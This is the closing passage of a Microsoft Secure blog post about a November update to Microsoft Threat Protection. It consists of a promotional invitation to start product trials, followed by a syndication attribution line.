Take a moment to learn more about Microsoft Threat Protection. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities. Start your trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.


The post The evolution of Microsoft Threat Protection, November update appeared first on Microsoft Secure.

Categories: Uncategorized Tags: